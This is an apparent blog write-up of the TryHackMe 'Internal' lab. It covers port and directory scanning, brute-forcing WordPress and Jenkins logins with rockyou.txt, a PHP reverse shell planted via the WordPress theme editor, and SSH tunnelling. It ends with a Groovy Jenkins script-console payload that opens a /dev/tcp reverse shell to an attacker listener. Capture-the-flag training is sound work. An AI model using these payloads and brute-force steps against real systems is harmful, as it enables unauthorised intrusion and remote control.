TryHackMe | Internal

5 min readMar 9, 2021

Hello everyone,Let’s solve one of the hard rated difficulty machine.It’s none other than internal.I don’t know why they rated it as hardest one.it is very easy to solve.For this,You need to have a little bit knowledge on wordpress,tunneling and bruteforcing.That’s it Let’s solve.

Requirements:

→wordpress

→Tunneling

→jenkins

→password bruteforcing.

Now Let’s begin with a Nmap scan.By the way,i’m using ubuntu as my attacker machine.Ok Let’s begin.

I’m using nmap to find some interesting ports.

“nmap -sC -sV <IP> -vv -oN scan”

Ok.There are only two ports open.ssh and apache httpd are running on 22 adn 80.The victim’s OS is ubuntu(From the scan results).

Let’s explore the webstie now.But first Let me add ‘internal.thm’ to my hosts file

There is no such useful informatin found on the default wbpage.So let’s find some interesting directories.I’m using gobuster here,u can also use dirb or dirbuster.

“gobuster -u http://internal.thm -w /usr/share/dirb/wordlists/big.txt -t 50”

Ok.Now i got some interesting dir’s Now let’s open /blog to explore.

Ok ,it’s just a wordpress site.we got our first point here.This site is a wordpress site.Now ,let’s find some vulnerabilites in this site using wpscan.

“wpscan --url http://internal.thm --enumerate p,u”

from the above command,the wpscan will find the plugins and users in out wordpress site.

From the above,scan we got one user names admin.but sadly no vulnerable plugins were found.It’s ok.Let’s bruteforce the credentials.Wpscan can bruteforce the login credentials.So i’m using wpscan for that.

“wpscan --url http://internal.thm -U admin -P /usr/share/wordlists/rockyou.txt”

Now this gave me the password.SO,let’s login with this credentials.

To gain a reverse shell. from the left side bar select appearance →theme-editor

Now let’s copy our reverse shell to searchresults.php . You can choose any page but i’m going with searchresults.php page.copy our php reverse shell and paste it here.Now update the file.Now let’s setup a listener and search some random text in the search bar.That’s it we are in.

Now let’s convert this shell in stable pty bash using python.

From here i don’t show the password.I’ll just show the text files.clear

let’s go to /opt folder.there we’ll get one password for a user.

So now let’s login with the password as the user.

OK we got the user flag. along with the user flag we got something names jenkins.txt

It says a jenkins service is running on 172.17.0.2:8080. Ok there is a jenkins service running but we can’t access it because we are not in the same network.In such conditions there is something which we can use to access that page form our machine.It is called Tunneling.Now i’m going to make a tunnel.

NOw let’s create a tunnel.

“ssh aubreanna@internal.thml -L 8080:localhost:8080”

Successfully we have created a tunnel between the attacker machine and victim’s machine.Now we can access the services that are running on localhost.So jenkins service running on port 8080.let’s explore it.

OK it’s a jenkin login screen but we don’t know the password.Let’s bruteforce it.i’m using burpsuite to do this.

“Remember you are running a tunnel proxy on 8080 so burp won’t work.Because 8080 port is already in use. so change the port no. to 8081 in browser proxy and also in burp.

“go to proxy →options .”

Now add a new proxy listener.

In browser,i’m using froxy proxy.

Now let’s capture the request and send it to the intruder.

Ok,here is the req.Now let’s send it to the intruder.

We need only to bruteforce password.So select attack type is sniper.I’m using rockyou.txt passlist.

OK after some time i’ve got the password with length 307.Now let’s use this password to login.

Ok we got the dashboard here.Now,It’s time to spawn a shell using this dashboard.For that let’s go to manage jenkins →script console

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/<IP>/1234;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

Here the payload for linux.

start a netcat listener.